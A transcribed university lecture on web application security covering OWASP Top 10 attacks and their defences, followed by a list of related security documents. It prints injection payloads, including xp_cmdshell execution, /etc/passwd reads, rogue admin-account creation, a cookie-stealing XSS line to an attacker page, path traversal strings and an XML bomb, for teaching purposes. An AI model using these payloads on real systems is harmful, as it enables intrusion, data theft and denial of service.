Advanced Security for Systems Engineering VO 01: Web Application Security
|
|
- Tyrone Warren
- 8 years ago
- Views:
Transcription
1 Advanced Security for Systems Engineering VO 01: Web Application Security Stefan Taber, Christian Schanes INSO Industrial Software Institute of Computer Aided Automation Faculty of Informatics TU Wien
2 Agenda OWASP Top 10 SQL Injection XPath Injection Cross Site Scripting Cross Site Request Forgery Path Traversal Attack File Upload Attack Session Management 2 / 52
3 Introduction Security for Systems Engineering gives basics about SQL Injection, XSS and CSRF In this lecture we show examples of several advanced attacks on web applications including the consequences of attacks presenting how different attacks can work together to break applications 3 / 52
4 Web Applications World Wide in Use Browser Apps Applications Presentations 4 / 52
5 OWASP Top Injection 2. Broken Authentication and Session Management 3. Cross Site Scripting (XSS) 4. Insecure Direct Object References 5. Security Misconfiguration 6. Sensitive Data Exposure 7. Missing Function Level Access Control 8. Cross Site Request Forgery (CSRF) 9. Using Components with Known Vulnerabilities 10. Unvalidated Redirects and Forwards (See 5 / 52
6 SQL Injection SQL Injection Insert SQL query data via the input data to the application and let the DMS interpret the malicious input. Blind SQL Injection The attacker has no direct feedback about the data but information about whether data is processed or not (side channel). Therefore, SQL Injection is possible but more effort is required to extract data from the target. 6 / 52
7 SQL Injection Identify Vulnerable Parameters (i) There are 3 main data types: number, string and date Identify vulnerable parameters of the type number Request: /myecommercesite/proddetails. asp?prodid=4 Testing: (1) SELECT FROM Products WHERE ProdID = 4 //ERROR (2) SELECT FROM Products WHERE ProdID = //OK The parameter is vulnerable because of (2)! 7 / 52
8 SQL Injection Identify Vulnerable Parameters (ii) Identify vulnerable strings Request: /myecommercesite/proddetails. asp?prodname=book Testing: 1. SELECT * FROM Products WHERE ProdName= Book //ERROR 2. SELECT * FROM Products WHERE ProdName= B + ook //OK If (2) works, the parameter is vulnerable! 8 / 52
9 Differences in Databases Database identification by database behavior Attacks depend on specific functions MS SQL MySQL Access Oracle DB2 Postgres Cat Strings + concat (" ", " ") " "&" " " "+" " Null Isnull() Ifnull() Iff(Isnull()) Ifnull() Ifnull() COALESCE() Position CHARINDEX LOCATE() InStr() InStr() InStr() TEXTPOS() OS xp_cmdshell select into #date# utf_file import/export Call Cast Yes No No No Yes Yes (See 9 / 52
10 Databases and Operating Systems Interaction with the file system Write files Read files Execute commands with the permissions of the database user 10 / 52
11 Blind SQL Injection Read Data The attacker has no feedback about the data but information about whether data is selected or not. Therefore, SQL Injection is possible but more effort is required to extract data from the target. A way to steal the data are Brute Force attacks. Output is only true or false 1. Example: customer exists/does not exist 2. admin and password like a% False 3. admin and password like b% True 4. admin and password like ba% False 5. admin and password like bk% True Automated Tools available, e.g., SqlDumper 11 / 52
12 UNION SELECT Injection UNION SELECT statements are used to combine multiple SQL statements to one single query Therefore, allows attacker to access all tables in a system All SELECT queries must have the same number of columns and the columns must have the same type 12 / 52
13 UNION SELECT Injection Example SELECT CCNum,CCType,CCExp,CCName FROM CreditCards WHERE AccNum= ORDER BY $order Inject order parameter: SELECT CCNum, CCType, CCExp, CCName FROM CreditCards WHERE AccNum= ORDER BY 1 UNION SELECT CCNum,NULL,NULL,NULL FROM CreditCards 13 / 52
14 Extended Stored Procedures MS-SQL MS-SQL Servers support a large number of extended stored procedures Implemented in DLLs Examples:... xp_cmdshell Execute commands on OS level xp_servicecontrol Start/stop services Example: Stopping the schedule service EXEC master..xp_servicecontrol stop, schedule Example: Execute ping ; exec master..xp_cmdshell ping ip-address / 52
15 Fileaccess MySQL Load local files into the database LOAD FILE UNION SELECT,,load_file( /etc/passwd ); Write files with data from the database SELECT INTO OUTFILE Attackers can write the files to folders where they have access Example: Using the Web Server to get the written file SELECT * FROM user INTO OUTFILE /webserver/database-dump 15 / 52
16 SQL Injection Add database user MS-SQL exec sp_addlogin evil, passwd exec sp_addsrvrolemember evil, sysadmin MySQL INSERT INTO mysql.user (user, host, password) VALUES ( evil, localhost, PASSWORD( passwd )) Oracle CREATE USER evil IDENTIFIED BY passwd TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; GRANT CONNECT TO evil; GRANT RESOURCE TO evil; 16 / 52
17 SQL Injection Avoiding Input Filters (i) Examples for tautologies OR 1=1 OR now()=now() OR 2 BETWEEN 1 AND 3 Using functions and encodings union select * from users where login = char(114,111,111,116); 17 / 52
18 SQL Injection Avoiding Input Filters (ii) Using blanks, tabs and line breaks UNION SELECT UNION SELECT Using comments /**/OR/**/ x = x select/**/*/**/from/**/users; It is difficult to create correct filters, especially own filters 18 / 52
19 SQL Injection Prevention and Mitigation Input validation Stored procedure and prepared statements Principle of least privilege Random delays on successful and failing statement execution 19 / 52
20 XPath Injection Similar to SQL Injection. Instead of SQL, XPath statements are used Often possible when XML is used as database //user[name= admin and pass= secure ] Inject: or = //user[name= admin and pass= unknown or = ] 20 / 52
21 Cross Site Scripting (XSS) Interpretation of maliciously injected code in the browser Basically the user is the target, not the application Application is be abused as medium The malicious script code is loaded from a trustfully site Starting point to execute arbitrary code controlled by the attacker on the client side 21 / 52
22 Cross Site Scripting Identify Vulnerable Parameters Basic test for injectable fields of a web page URL parameter Any field in the page Headers of a HTTP message Test vectors Plain HTML: <h1>, <b>, <br/>, <img src=... > JavaScript: <script>...</script>, <img src= javascript:..., <b onmouseover=... > 22 / 52
23 Cross Site Scripting Examples Redirects <script>window. location. replace ( http :// stackoverflow.com );</script> Session Hijacking http ://www. testdomain.com/default. aspx?username =<script>window. location. href= http ://www. attackerpage.com/index.php?content= +document. cookie</script> 23 / 52
24 Cross Site Scripting Avoiding Input Filters <IMG SRC= javascript : alert ( XSS ); > <IMG SRC=javascript : alert ( XSS )> <IMG SRC=JaVaScRiPt: alert ( XSS )> <IMG SRC=javasc ript:ale rt('XSS')> ><STYLE>@import javascript : alert ( XSS ) ;</STYLE> >%22%27><img%20src%3d%22javascript : alert(%27%20xss%27)%22> %uff1cscript%uff1ealert ( XSS )%uff1c/script%uff1e ;! <XSS>=&{()} (See 24 / 52
25 MySpace Worm (Samy Worm) as Example Adds profile Samy to users Within one day more than contact requests JavaScript in CSS <div style="background:url( javascript:alert(1) )"> Avoid filtering of javascript via java\nscript Avoid filtering of " via String.fromCharCode(34) Avoid filtering of innerhtml via eval( document.body.inne + rhtml ) Using XML-HTTP (AJAX) for attacking the target (See 25 / 52
26 Cross Site Scripting Prevention Input validation Filter or disable JavaScript and Flash in browser Content Security Policy 26 / 52
27 Cross Site Request Forgery (CSRF) CSRF: Abusing the trust of an application in the user Attacker sends a compromised HTTP request to the victim via the user 27 / 52
28 CSRF Identify Vulnerable Parameters (i) Identify unvalidated redirects and forwards Identify Insecure Direct Object References Identify SQL Injection vulnerable parameters Identify XSS vulnerable parameters Img-Tag Injection 28 / 52
29 CSRF Identify Vulnerable Parameters (ii) let u be the URL being tested; for example, u = build a html page containing the HTTP request referencing URL u (specifying all relevant parameters; in the case of HTTP GET this is straightforward, while for a POST request you need to resort to some Javascript); make sure that the valid user is logged on the application; induce him into following the link pointing to the URL to be tested (social engineering involved if you cannot impersonate the user yourself); observe the result, i.e. check if the web server executed the request. (See (OTG-SESS-005)) 29 / 52
30 CSRF with Routers/Firewalls 1. Attacker creates a manipulated web page 2. User opens the manipulated web page 3. The response of the server is returned 4. Browser directly executes the commands in the response (without user interaction) 5. Attacker has access to the internal system and can modify the system, e.g., modify the firewall configuration 30 / 52
31 Examples of CSRF Attacks Multiple CSRF attacks in DD-WRT (Remote Root Command Execution) Cisco Router HTTP Administration CSRF Remote Command Execution OpenCA Cross Site Request Forgery (CVE ) 31 / 52
32 CSRF Prevention Input validation Secret information with every request (e.g., token) Encrypted end-to-end connection Good Random Number Generator <form> <input type= hidden name= token value= 123 > New password : <input type= password name= new pwd > <input type= submit value= Submit > <a href= /users/userdetails?id=5&token=123 >Cancel</a> </form> 32 / 52
33 Path Traversal Attack Web directories are virtual directories based on the Operating System Specific failures (Perl scripts, Unicode,...) allow to break out from the directory structure provided by the web server Allows unauthorized access to files and programs on OS level Attackers are using this to navigate through directories and to collect information 33 / 52
34 Path Traversal Identify Vulnerable Parameters Basic test for fields of a web page URL parameter URL path Headers of a HTTP message Test vectors../../../../etc/passwd../../boot.ini..\..\boot.ini 34 / 52
35 Example of Path-Traversal / Command Injection Path-Traversal using Unicode system32/cmd.exe?/c+dir Decoding the Unicode characters results in: system32/cmd.exe?/c+dir 35 / 52
36 Path Traversal Prevention Configuration hardening Input validation Principle of least privilege 36 / 52
37 File Upload Attack Using file upload fields to upload malicious files Possible attacks DoS Command Injection 37 / 52
38 File Upload Attack Identify Vulnerable Parameters Null-Byte-File Large files Wrong filetype XSS by filename 38 / 52
39 File Upload Attack XML Bomb Create a high processing load with minimal data Allows Denial of Service attacks <?xml version= 1.0?> <!DOCTYPE foobar [ <!ENTITY x0 ESSE > <!ENTITY x1 &x0;&x0; > <!ENTITY x2 &x1;&x1; >... <!ENTITY x98 &x97;&x97; > <!ENTITY x99 &x98;&x98; > ]> <foobar>&x99;</foobar> 39 / 52
40 File Upload Attack Prevention Limit for file size Break upload when file size is over limit Input validation Principle of least privilege Configuration hardening Validate filetype by magic number (like the UNIX command file ) 40 / 52
41 HTTP Session Management HTTP is stateless Session Management required using cookies, hidden form fields, URL parameter Client-side sessions vs. server-side sessions Cookies: session data is part of the HTTP header (e.g., non-persistent cookies) URL parameter: pass session data via URL (e.g., "parameter=value", multiple values separated by &) Hidden form fields: hidden HTML code, detectable by source code analysis (e.g., <input type="hidden" name="name" value="value">) 41 / 52
42 Session ID Sessions store information about the actual state User login User remains logged in Sessions implemented by session IDs Takeover of existing sessions possible Bad quality of session IDs Random session IDs vs. built session IDs (username, date,...) Cookies vs. encoded into the url as parameter Session IDs in referrer available for other pages 42 / 52
43 Identify Vulnerabe Session IDs Entropy of Sessions IDs Does a user get a new session ID after a successful login? Is the session destroyed after logout? 43 / 52
44 Session Fixation Attack (i) 44 / 52
45 Session Fixation Attack (ii) 1. Attacker sends request to the web server 2. Web server generates a new session and transfers the session ID 3. Attacker sends a link with the session ID to the victim 4. Victim opens the link 5. Victim logs into the web service using the supplied session ID Attacker has now a valid session with the identity of the victim 45 / 52
46 Pseudo Random Number Generator (PRNG) Many security methods depend on the unpredictability of random numbers Cryptographic keys Session IDs Authentication Protocols / Handshake Security of PRNG depends on: Confidentiality and randomness of the seed Quality of the algorithm 46 / 52
47 Session IDs Protection Techniques Secure Random Number Generator Existing libraries for session management New session ID after login Timelimit for sessions Use security flags in session ID cookies HttpOnly: the cookie cannot be accessed through client side script Secure: send only over HTTPS Expire: expire date Encrypted connection (HTTPS) 47 / 52
48 Combinations of Attacks Download source code using Path Traversal Source analysis finds a weak PRNG Predictable CSRF tokens Launch CSRF attacks 48 / 52
49 Input Filter Input validation Blacklist filter Whitelist filter Sanitization Backlist filters based on signatures are complex, because there are so many ways to express the same. 49 / 52
50 Summary Web application security required OWASP Top 10 vulnerabilities Advanced attack techniques to break web applications (SQL Injection, XSS, CSRF, XML Attacks) Prevention and Mitigation of such attacks 50 / 52
51 Literature/Links Michal Zalewski. The Tangled Web: A Guide to Securing Modern Web Applications. No Starch Press, San Francisco, CA, USA, 1 edition, ISBN , Open Web Application Security Project OWASP Top 10 Project OWASP Testing Guide Web Application Security Consortium RFC 2616 (HTTP 1.1) 51 / 52
52 Thank you! INSO Industrial Software Institute of Computer Aided Automation Faculty of Informatics TU Wien
Criteria for web application security check. Version 2015.1
Criteria for web application security check Version 2015.1 i Content Introduction... iii ISC- P- 001 ISC- P- 001.1 ISC- P- 001.2 ISC- P- 001.3 ISC- P- 001.4 ISC- P- 001.5 ISC- P- 001.6 ISC- P- 001.7 ISC-
More informationCheck list for web developers
Check list for web developers Requirement Yes No Remarks 1. Input Validation 1.1) Have you done input validation for all the user inputs using white listing and/or sanitization? 1.2) Does the input validation
More informationWeb application security
Web application security Sebastian Lopienski CERN Computer Security Team openlab and summer lectures 2010 (non-web question) Is this OK? int set_non_root_uid(int uid) { // making sure that uid is not 0
More informationWhere every interaction matters.
Where every interaction matters. Peer 1 Vigilant Web Application Firewall Powered by Alert Logic The Open Web Application Security Project (OWASP) Top Ten Web Security Risks and Countermeasures White Paper
More informationHow to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering
How to break in Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering Time Agenda Agenda Item 9:30 10:00 Introduction 10:00 10:45 Web Application Penetration
More informationASP.NET MVC Secure Coding 4-Day hands on Course. Course Syllabus
ASP.NET MVC Secure Coding 4-Day hands on Course Course Syllabus Course description ASP.NET MVC Secure Coding 4-Day hands on Course Secure programming is the best defense against hackers. This multilayered
More informationHack Proof Your Webapps
Hack Proof Your Webapps About ERM About the speaker Web Application Security Expert Enterprise Risk Management, Inc. Background Web Development and System Administration Florida International University
More informationWhat is Web Security? Motivation
brucker@inf.ethz.ch http://www.brucker.ch/ Information Security ETH Zürich Zürich, Switzerland Information Security Fundamentals March 23, 2004 The End Users View The Server Providers View What is Web
More informationState of The Art: Automated Black Box Web Application Vulnerability Testing. Jason Bau, Elie Bursztein, Divij Gupta, John Mitchell
Stanford Computer Security Lab State of The Art: Automated Black Box Web Application Vulnerability Testing, Elie Bursztein, Divij Gupta, John Mitchell Background Web Application Vulnerability Protection
More informationCSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities
CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities Thomas Moyer Spring 2010 1 Web Applications What has changed with web applications? Traditional applications
More information(WAPT) Web Application Penetration Testing
(WAPT) Web Application Penetration Testing Module 0: Introduction 1. Introduction to the course. 2. How to get most out of the course 3. Resources you will need for the course 4. What is WAPT? Module 1:
More informationFINAL DoIT 11.03.2015 - v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES
Purpose: The Department of Information Technology (DoIT) is committed to developing secure applications. DoIT s System Development Methodology (SDM) and Application Development requirements ensure that
More informationCracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH zgrace@403labs.com January 17, 2014 2014 Mega Conference
Cracking the Perimeter via Web Application Hacking Zach Grace, CISSP, CEH zgrace@403labs.com January 17, 2014 2014 Mega Conference About 403 Labs 403 Labs is a full-service information security and compliance
More informationWEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY
WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY www.alliancetechpartners.com WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY More than 70% of all websites have vulnerabilities
More informationWeb Application Report
Web Application Report This report includes important security information about your Web Application. Security Report This report was created by IBM Rational AppScan 8.5.0.1 11/14/2012 8:52:13 AM 11/14/2012
More informationIs Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security
Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security Presented 2009-05-29 by David Strauss Thinking Securely Security is a process, not
More informationHacking de aplicaciones Web
HACKING SCHOOL Hacking de aplicaciones Web Gabriel Maciá Fernández Fundamentos de la web CLIENTE SERVIDOR BROWSER HTTP WEB SERVER DATOS PRIVADOS BASE DE DATOS 1 Interacción con servidores web URLs http://gmacia:pass@www.ugr.es:80/descarga.php?file=prueba.txt
More informationTesting the OWASP Top 10 Security Issues
Testing the OWASP Top 10 Security Issues Andy Tinkham & Zach Bergman, Magenic Technologies Contact Us 1600 Utica Avenue South, Suite 800 St. Louis Park, MN 55416 1 (877)-277-1044 info@magenic.com Who Are
More informationLecture 11 Web Application Security (part 1)
Lecture 11 Web Application Security (part 1) Computer and Network Security 4th of January 2016 Computer Science and Engineering Department CSE Dep, ACS, UPB Lecture 11, Web Application Security (part 1)
More informationEssential IT Security Testing
Essential IT Security Testing Application Security Testing for System Testers By Andrew Muller Director of Ionize Who is this guy? IT Security consultant to the stars Member of OWASP Member of IT-012-04
More informationArcGIS Server Security Threats & Best Practices 2014. David Cordes Michael Young
ArcGIS Server Security Threats & Best Practices 2014 David Cordes Michael Young Agenda Introduction Threats Best practice - ArcGIS Server settings - Infrastructure settings - Processes Summary Introduction
More informationWeb applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh
Web applications Web security: web basics Myrto Arapinis School of Informatics University of Edinburgh HTTP March 19, 2015 Client Server Database (HTML, JavaScript) (PHP) (SQL) 1 / 24 2 / 24 URLs HTTP
More informationWeb Application Security
Web Application Security Security Mitigations Halito 26 juni 2014 Content Content... 2 Scope of this document... 3 OWASP Top 10... 4 A1 - Injection... 4... 4... 4 A2 - Broken Authentication and Session
More informationAdvanced Web Technology 10) XSS, CSRF and SQL Injection 2
Berner Fachhochschule, Technik und Informatik Advanced Web Technology 10) XSS, CSRF and SQL Injection Dr. E. Benoist Fall Semester 2010/2011 Table of Contents Cross Site Request Forgery - CSRF Presentation
More informationExternal Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION
External Vulnerability Assessment -Technical Summary- Prepared for: ABC ORGANIZATI On March 9, 2008 Prepared by: AOS Security Solutions 1 of 13 Table of Contents Executive Summary... 3 Discovered Security
More informationWeb Application Vulnerability Testing with Nessus
The OWASP Foundation http://www.owasp.org Web Application Vulnerability Testing with Nessus Rïk A. Jones, CISSP rikjones@computer.org Rïk A. Jones Web developer since 1995 (16+ years) Involved with information
More informationWeb Application Guidelines
Web Application Guidelines Web applications have become one of the most important topics in the security field. This is for several reasons: It can be simple for anyone to create working code without security
More informationWeb Application Security Guidelines for Hosting Dynamic Websites on NIC Servers
Web Application Security Guidelines for Hosting Dynamic Websites on NIC Servers The Website can be developed under Windows or Linux Platform. Windows Development should be use: ASP, ASP.NET 1.1/ 2.0, and
More informationWeb Security Testing Cookbook*
Web Security Testing Cookbook* Systematic Techniques to Find Problems Fast Paco Hope and Ben Walther O'REILLY' Beijing Cambridge Farnham Koln Sebastopol Tokyo Table of Contents Foreword Preface xiii xv
More information3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management
What is an? s Ten Most Critical Web Application Security Vulnerabilities Anthony LAI, CISSP, CISA Chapter Leader (Hong Kong) anthonylai@owasp.org Open Web Application Security Project http://www.owasp.org
More informationMagento Security and Vulnerabilities. Roman Stepanov
Magento Security and Vulnerabilities Roman Stepanov http://ice.eltrino.com/ Table of contents Introduction Open Web Application Security Project OWASP TOP 10 List Common issues in Magento A1 Injection
More informationWeb-Application Security
Web-Application Security Kristian Beilke Arbeitsgruppe Sichere Identität Fachbereich Mathematik und Informatik Freie Universität Berlin 29. Juni 2011 Overview Web Applications SQL Injection XSS Bad Practice
More informationThe Top Web Application Attacks: Are you vulnerable?
QM07 The Top Web Application Attacks: Are you vulnerable? John Burroughs, CISSP Sr Security Architect, Watchfire Solutions jburroughs@uk.ibm.com Agenda Current State of Web Application Security Understanding
More informationSitefinity Security and Best Practices
Sitefinity Security and Best Practices Table of Contents Overview The Ten Most Critical Web Application Security Risks Injection Cross-Site-Scripting (XSS) Broken Authentication and Session Management
More informationOut of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet
Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet March 8, 2012 Stephen Kost Chief Technology Officer Integrigy Corporation Phil Reimann Director of Business Development
More informationWeb Application Security. Vulnerabilities, Weakness and Countermeasures. Massimo Cotelli CISSP. Secure
Vulnerabilities, Weakness and Countermeasures Massimo Cotelli CISSP Secure : Goal of This Talk Security awareness purpose Know the Web Application vulnerabilities Understand the impacts and consequences
More information1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications
1. Introduction 2. Web Application 3. Components 4. Common Vulnerabilities 5. Improving security in Web applications 2 What does World Wide Web security mean? Webmasters=> confidence that their site won
More informationIntrusion detection for web applications
Intrusion detection for web applications Intrusion detection for web applications Łukasz Pilorz Application Security Team, Allegro.pl Reasons for using IDS solutions known weaknesses and vulnerabilities
More informationStill Aren't Doing. Frank Kim
Ten Things Web Developers Still Aren't Doing Frank Kim Think Security Consulting Background Frank Kim Consultant, Think Security Consulting Security in the SDLC SANS Author & Instructor DEV541 Secure Coding
More informationWeb Application Security
Web Application Security Prof. Sukumar Nandi Indian Institute of Technology Guwahati Agenda Web Application basics Web Network Security Web Host Security Web Application Security Best Practices Questions?
More informationWeb Application Hacking (Penetration Testing) 5-day Hands-On Course
Web Application Hacking (Penetration Testing) 5-day Hands-On Course Web Application Hacking (Penetration Testing) 5-day Hands-On Course Course Description Our web sites are under attack on a daily basis
More informationOWASP TOP 10 ILIA ALSHANETSKY @ILIAA HTTPS://JOIND.IN/15741
OWASP TOP 10 ILIA ALSHANETSKY @ILIAA HTTPS://JOIND.IN/15741 ME, MYSELF & I PHP Core Developer Author of Guide to PHP Security Security Aficionado THE CONUNDRUM USABILITY SECURITY YOU CAN HAVE ONE ;-) OPEN
More informationAdobe Systems Incorporated
Adobe Connect 9.2 Page 1 of 8 Adobe Systems Incorporated Adobe Connect 9.2 Hosted Solution June 20 th 2014 Adobe Connect 9.2 Page 2 of 8 Table of Contents Engagement Overview... 3 About Connect 9.2...
More informationJava Web Application Security
Java Web Application Security RJUG Nov 11, 2003 Durkee Consulting www.rd1.net 1 Ralph Durkee SANS Certified Mentor/Instructor SANS GIAC Network Security and Software Development Consulting Durkee Consulting
More informationSecure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda 1. Introductions for new members (5 minutes) 2. Name of group 3. Current
More informationWHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats
WHITE PAPER FortiWeb and the OWASP Top 10 PAGE 2 Introduction The Open Web Application Security project (OWASP) Top Ten provides a powerful awareness document for web application security. The OWASP Top
More informationCTF Web Security Training. Engin Kirda ek@ccs.neu.edu
CTF Web Security Training Engin Kirda ek@ccs.neu.edu Web Security Why It is Important Easiest way to compromise hosts, networks and users Widely deployed ( payload No Logs! (POST Request Difficult to defend
More informationOWASP and OWASP Top 10 (2007 Update) OWASP. The OWASP Foundation. Dave Wichers. The OWASP Foundation. OWASP Conferences Chair dave.wichers@owasp.
and Top 10 (2007 Update) Dave Wichers The Foundation Conferences Chair dave.wichers@owasp.org COO, Aspect Security dave.wichers@aspectsecurity.com Copyright 2007 - The Foundation This work is available
More informationAnnex B - Content Management System (CMS) Qualifying Procedure
Page 1 DEPARTMENT OF Version: 1.5 Effective: December 18, 2014 Annex B - Content Management System (CMS) Qualifying Procedure This document is an annex to the Government Web Hosting Service (GWHS) Memorandum
More informationCertified Secure Web Application Secure Development Checklist
www.certifiedsecure.com info@certifiedsecure.com Tel.: +31 (0)70 310 13 40 Loire 128-A 2491 AJ The Hague The Netherlands About Certified Secure Checklist Certified Secure exists to encourage and fulfill
More informationStatistics Whitepaper
White paper Statistics Whitepaper Web Application Vulnerability Statistics 2010-2011 Alex Hopkins whitepapers@contextis.com February 2012 Context Information Security 30 Marsh Wall, London, E14 9TP +44
More informationWeb Application Penetration Testing
Web Application Penetration Testing 2010 2010 AT&T Intellectual Property. All rights reserved. AT&T and the AT&T logo are trademarks of AT&T Intellectual Property. Will Bechtel William.Bechtel@att.com
More informationChapter 1 Web Application (In)security 1
Introduction xxiii Chapter 1 Web Application (In)security 1 The Evolution of Web Applications 2 Common Web Application Functions 4 Benefits of Web Applications 5 Web Application Security 6 "This Site Is
More informationCross-Site Scripting
Cross-Site Scripting (XSS) Computer and Network Security Seminar Fabrice Bodmer (fabrice.bodmer@unifr.ch) UNIFR - Winter Semester 2006-2007 XSS: Table of contents What is Cross-Site Scripting (XSS)? Some
More informationSichere Software- Entwicklung für Java Entwickler
Sichere Software- Entwicklung für Java Entwickler Dominik Schadow Senior Consultant Trivadis GmbH 05/09/2012 BASEL BERN LAUSANNE ZÜRICH DÜSSELDORF FRANKFURT A.M. FREIBURG I.BR. HAMBURG MÜNCHEN STUTTGART
More informationWeb Application Attacks And WAF Evasion
Web Application Attacks And WAF Evasion Ahmed ALaa (EG-CERT) 19 March 2013 What Are We Going To Talk About? - introduction to web attacks - OWASP organization - OWASP frameworks - Crawling & info. gathering
More informationCertified Secure Web Application Security Test Checklist
www.certifiedsecure.com info@certifiedsecure.com Tel.: +31 (0)70 310 13 40 Loire 128-A 2491 AJ The Hague The Netherlands Certified Secure Checklist About Certified Secure exists to encourage and fulfill
More informationWeb Application Security
Web Application Security John Zaharopoulos ITS - Security 10/9/2012 1 Web App Security Trends Web 2.0 Dynamic Webpages Growth of Ajax / Client side Javascript Hardening of OSes Secure by default Auto-patching
More informationWeb Application Security
Web Application Security A Beginner's Guide Bryan Sullivan Vincent Liu Mc r New York Chicago San Francisco Lisbon London Madrid Mexico City Milan New Delhi San Juan Seoul Singapore Sydney Toronto Contents
More informationThick Client Application Security
Thick Client Application Security Arindam Mandal (arindam.mandal@paladion.net) (http://www.paladion.net) January 2005 This paper discusses the critical vulnerabilities and corresponding risks in a two
More informationUsing Foundstone CookieDigger to Analyze Web Session Management
Using Foundstone CookieDigger to Analyze Web Session Management Foundstone Professional Services May 2005 Web Session Management Managing web sessions has become a critical component of secure coding techniques.
More informationNational Information Security Group The Top Web Application Hack Attacks. Danny Allan Director, Security Research
National Information Security Group The Top Web Application Hack Attacks Danny Allan Director, Security Research 1 Agenda Web Application Security Background What are the Top 10 Web Application Attacks?
More informationWeb Application Firewall on SonicWALL SRA
Web Application Firewall on SonicWALL SRA Document Scope This document describes how to configure and use the Web Application Firewall feature in SonicWALL SRA 6.0. This document contains the following
More informationLast update: February 23, 2004
Last update: February 23, 2004 Web Security Glossary The Web Security Glossary is an alphabetical index of terms and terminology relating to web application security. The purpose of the Glossary is to
More informationBug Report. Date: March 19, 2011 Reporter: Chris Jarabek (cjjarabe@ucalgary.ca)
Bug Report Date: March 19, 2011 Reporter: Chris Jarabek (cjjarabe@ucalgary.ca) Software: Kimai Version: 0.9.1.1205 Website: http://www.kimai.org Description: Kimai is a web based time-tracking application.
More informationA Survey on Security and Vulnerabilities of Web Application
A Survey on Security and Vulnerabilities of Web Application Gopal R. Chaudhari, Prof. Madhav V. Vaidya Department of Information Technology, SGGS IE & T, Nanded, Maharashtra, India-431606 Abstract Web
More informationColumbia University Web Security Standards and Practices. Objective and Scope
Columbia University Web Security Standards and Practices Objective and Scope Effective Date: January 2011 This Web Security Standards and Practices document establishes a baseline of security related requirements
More informationVIDEO intypedia007en LESSON 7: WEB APPLICATION SECURITY - INTRODUCTION TO SQL INJECTION TECHNIQUES. AUTHOR: Chema Alonso
VIDEO intypedia007en LESSON 7: WEB APPLICATION SECURITY - INTRODUCTION TO SQL INJECTION TECHNIQUES AUTHOR: Chema Alonso Informática 64. Microsoft MVP Enterprise Security Hello and welcome to Intypedia.
More informationIntroduction:... 1 Security in SDLC:... 2 Penetration Testing Methodology: Case Study... 3
Table of Contents Introduction:... 1 Security in SDLC:... 2 Penetration Testing Methodology: Case Study... 3 Information Gathering... 3 Vulnerability Testing... 7 OWASP TOP 10 Vulnerabilities:... 8 Injection
More informationMatriXay WEB Application Vulnerability Scanner V 5.0. 1. Overview. (DAS- WEBScan ) - - - - - The best WEB application assessment tool
MatriXay DAS-WEBScan MatriXay WEB Application Vulnerability Scanner V 5.0 (DAS- WEBScan ) - - - - - The best WEB application assessment tool 1. Overview MatriXay DAS- Webscan is a specific application
More informationSQL Injection. Sajjad Pourali sajjad@securation.com CERT of Ferdowsi University of Mashhad
SQL Injection Sajjad Pourali sajjad@securation.com CERT of Ferdowsi University of Mashhad SQL Injection Ability to inject SQL commands into the database engine Flaw in web application, not the DB or web
More informationWeb Application Firewall on SonicWALL SSL VPN
Web Application Firewall on SonicWALL SSL VPN Document Scope This document describes how to configure and use the Web Application Firewall feature in SonicWALL SSL VPN 5.0. This document contains the following
More informationEVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke
EVALUATING COMMERCIAL WEB APPLICATION SECURITY By Aaron Parke Outline Project background What and why? Targeted sites Testing process Burp s findings Technical talk My findings and thoughts Questions Project
More informationHow To Fix A Web Application Security Vulnerability
Proposal of Improving Web Application Security in Context of Latest Hacking Trends RADEK VALA, ROMAN JASEK Department of Informatics and Artificial Intelligence Tomas Bata University in Zlin, Faculty of
More informationAttack Vector Detail Report Atlassian
Attack Vector Detail Report Atlassian Report As Of Tuesday, March 24, 2015 Prepared By Report Description Notes cdavies@atlassian.com The Attack Vector Details report provides details of vulnerability
More informationWeb Application Firewalls Evaluation and Analysis. University of Amsterdam System & Network Engineering MSc
Web Application Firewalls Evaluation and Analysis Andreas Karakannas Andreas.Karakanas@os3.nl George Thessalonikefs George.Thessalonikefs@os3.nl University of Amsterdam System & Network Engineering MSc
More informationSoftware Assurance Tools: Web Application Security Scanner Functional Specification Version 1.0
Special Publication 500-269 Software Assurance Tools: Web Application Security Scanner Functional Specification Version 1.0 Paul E. Black Elizabeth Fong Vadim Okun Romain Gaucher Software Diagnostics and
More informationelearning for Secure Application Development
elearning for Secure Application Development Curriculum Application Security Awareness Series 1-2 Secure Software Development Series 2-8 Secure Architectures and Threat Modeling Series 9 Application Security
More informationSecure development and the SDLC. Presented By Jerry Hoff @jerryhoff
Secure development and the SDLC Presented By Jerry Hoff @jerryhoff Agenda Part 1: The Big Picture Part 2: Web Attacks Part 3: Secure Development Part 4: Organizational Defense Part 1: The Big Picture Non
More informationNuclear Regulatory Commission Computer Security Office Computer Security Standard
